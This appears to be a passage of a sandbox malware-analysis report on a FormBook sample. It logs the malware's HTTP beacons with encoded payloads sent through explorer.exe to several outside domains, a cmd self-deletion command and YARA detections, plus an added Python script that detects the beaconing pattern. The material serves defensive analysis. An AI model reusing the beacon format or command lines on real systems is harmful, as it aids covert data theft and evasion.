                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 62 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                Data Ascii: b9<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                Session ID: 6 | Source: 192.168.2.4:49768 | Destination: 162.241.62.54:80 | Process: C:\Windows\explorer.exe
                                                                Jul 22, 2021 17:59:42.309887886 CEST | 8140 kB transferred | OUT | GET /dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.jorgeporcayo.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:43.077874899 CEST | 8141 kB transferred | IN | HTTP/1.1 200 OK
                                                                Date: Thu, 22 Jul 2021 15:59:42 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                Retry-After: 86400
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Vary: Accept-Encoding
                                                                Accept-Ranges: none
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 6f 76 69 6d 69 65 6e 74 6f 20 70 65 72 73 6f 6e 61 6c 20 79 20 73 6f 63 69 61 6c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 
33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74
                                                                Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt


                                                                Session ID: 7 | Source: 192.168.2.4:49769 | Destination: 172.67.129.33:80 | Process: C:\Windows\explorer.exe
                                                                Jul 22, 2021 17:59:47.938975096 CEST | 8144 kB transferred | OUT | GET /dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.builtbydawn.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:48.012661934 CEST | 8145 kB transferred | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 22 Jul 2021 15:59:48 GMT
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 22 Jul 2021 16:59:47 GMT
                                                                Location: https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw
                                                                cf-request-id: 0b708ad90300004a683739f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AQaOuQBfkaMhbLJYTnjyTn%2B9V6LFXVSCCrJZFhJdSk1iIL0Ti%2FSzxRG7q%2BX8h03hw5r6JYtETdd%2FrLCVsXRDyGbFTsxD61nVk%2FFDnj0efn5Y45Zl%2FnKYd4pp7XLxmEr8HXM%2BSmLs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Server: cloudflare
                                                                CF-RAY: 672de0d4dc534a68-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID: 8 | Source: 192.168.2.4:49770 | Destination: 34.102.136.180:80 | Process: C:\Windows\explorer.exe
                                                                Jul 22, 2021 17:59:53.125844002 CEST | 8146 kB transferred | OUT | GET /dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw HTTP/1.1
                                                                Host: www.invisiongc.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jul 22, 2021 17:59:53.264167070 CEST | 8147 kB transferred | IN | HTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Thu, 22 Jul 2021 15:59:53 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "60ef677e-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
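                                                                Every session above has the same shape: the same path (/dy8g/), one query parameter (m4L0u) whose value never changes, one parameter (4hoDb) carrying a different opaque blob each time, no User-Agent, and explorer.exe as the client, while the destination host changes on every request (most of them are unrelated sites that answer 301/404/403, which is how FormBook hides its real panel among decoys). The script below is an added example for this report, not Joe Sandbox or FormBook code: it clusters request records by path, separates the constant "campaign marker" parameter from the varying payload, and checks the two client-side tells (missing User-Agent, Windows system binary as originator). The records are constructed from the six sessions on the page plus two browser requests to example.com and example.org that are added as a benign control; the record layout and the SYSTEM_BINARIES list are this script's own assumptions.

```python
"""Cluster HTTP requests that share a URI path and a constant query parameter
across many destination hosts (the FormBook beaconing shape seen above).

Added example for this report, not Joe Sandbox or FormBook code.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: Windows binaries that should not originate HTTP traffic themselves.
SYSTEM_BINARIES = {"explorer.exe", "svchost.exe", "cscript.exe", "wscript.exe"}

BEACON_HEADERS = {"Connection": "close"}                 # no User-Agent, as on the page
BROWSER_HEADERS = {"User-Agent": "Mozilla/5.0", "Connection": "keep-alive"}


def beacon(host, token):
    """Build a record in the exact shape of the explorer.exe requests above."""
    return ("C:\\Windows\\explorer.exe", host, BEACON_HEADERS,
            f"GET /dy8g/?4hoDb={token}&m4L0u=bZcPvDKxdtw HTTP/1.1")


# Constructed records: (originating process, Host header, other headers, request line).
# The six beacons copy the page's sessions; the two favicon requests are a benign control.
SESSIONS = [
    beacon("www.professioneconsulenza.net", "B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev"),
    beacon("www.iwccgroup.com", "7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW"),
    beacon("www.manageoceanaccount.com", "zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1"),
    beacon("www.jorgeporcayo.com", "q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR"),
    beacon("www.builtbydawn.com", "w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX"),
    beacon("www.invisiongc.net", "MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "example.com", BROWSER_HEADERS,
     "GET /favicon.ico HTTP/1.1"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "example.org", BROWSER_HEADERS,
     "GET /favicon.ico HTTP/1.1"),
]


def parse_request(line):
    """Split 'METHOD target HTTP/x.y' into (method, path, params).

    Query values are kept raw (no %-decoding, '+' stays '+') so the encrypted
    blob is compared byte-for-byte rather than after URL decoding."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    params = {}
    for pair in (parts.query.split("&") if parts.query else []):
        key, _, value = pair.partition("=")
        params[key] = value
    return method, parts.path, params


def cluster_beacons(sessions):
    """Group requests by path. For each path hit on 2+ hosts, split the query
    keys into those whose value is identical everywhere (campaign marker) and
    those that vary (per-beacon payload), and note the client-side tells."""
    by_path = defaultdict(list)
    for process, host, headers, line in sessions:
        _method, path, params = parse_request(line)
        by_path[path].append((process, host, headers, params))

    clusters = {}
    for path, reqs in by_path.items():
        hosts = sorted({host for _p, host, _h, _q in reqs})
        if len(hosts) < 2:
            continue                                   # single-host paths are not rotation
        shared_keys = set.intersection(*(set(q) for _p, _h, _hd, q in reqs))
        constant = {k: reqs[0][3][k] for k in shared_keys
                    if len({q[k] for _p, _h, _hd, q in reqs}) == 1}
        clusters[path] = {
            "hosts": hosts,
            "constant": constant,
            "varying": sorted(shared_keys - set(constant)),
            "no_user_agent": all("User-Agent" not in h for _p, _h, h, _q in reqs),
            "system_process": sorted({p.rsplit("\\", 1)[-1].lower()
                                      for p, *_ in reqs} & SYSTEM_BINARIES),
        }
    return clusters


def is_beacon_cluster(info, min_hosts=3):
    """Verdict: many hosts, one fixed marker plus one varying blob, no
    User-Agent, and a Windows system binary as the HTTP client."""
    return (len(info["hosts"]) >= min_hosts and bool(info["constant"])
            and bool(info["varying"]) and info["no_user_agent"]
            and bool(info["system_process"]))


def report(sessions):
    """Return (path, marker, hosts) for every cluster judged to be beaconing."""
    out = []
    for path, info in cluster_beacons(sessions).items():
        if is_beacon_cluster(info):
            marker = "&".join(f"{k}={v}" for k, v in sorted(info["constant"].items()))
            out.append((path, marker, info["hosts"]))
    return out


if __name__ == "__main__":
    for path, marker, hosts in report(SESSIONS):
        print(f"{path} marker={marker} hosts={len(hosts)}")
        for h in hosts:
            print("   ", h)
```

                                                                The marker value (here m4L0u=bZcPvDKxdtw) and the path are the stable pieces to pivot on across samples of one campaign; the host list should be treated as a mix of decoys and the real panel, so block the marker pattern in the proxy rather than the individual domains.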


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior


                                                                System Behavior

                                                                General

                                                                Start time:17:57:43
                                                                Start date:22/07/2021
                                                                Path:C:\Users\user\Desktop\85vLO1Rpcy.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\85vLO1Rpcy.exe'
                                                                Imagebase:0x400000
                                                                File size:177038 bytes
                                                                MD5 hash:91663BEE11EC2466C36FF85805041FFF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:17:57:45
                                                                Start date:22/07/2021
                                                                Path:C:\Users\user\Desktop\85vLO1Rpcy.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\85vLO1Rpcy.exe'
                                                                Imagebase:0x400000
                                                                File size:177038 bytes
                                                                MD5 hash:91663BEE11EC2466C36FF85805041FFF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:17:57:51
                                                                Start date:22/07/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff6fee60000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:17:58:12
                                                                Start date:22/07/2021
                                                                Path:C:\Windows\SysWOW64\cscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                Imagebase:0x310000
File size: 143360 bytes
MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 17:58:17
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:58:17
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
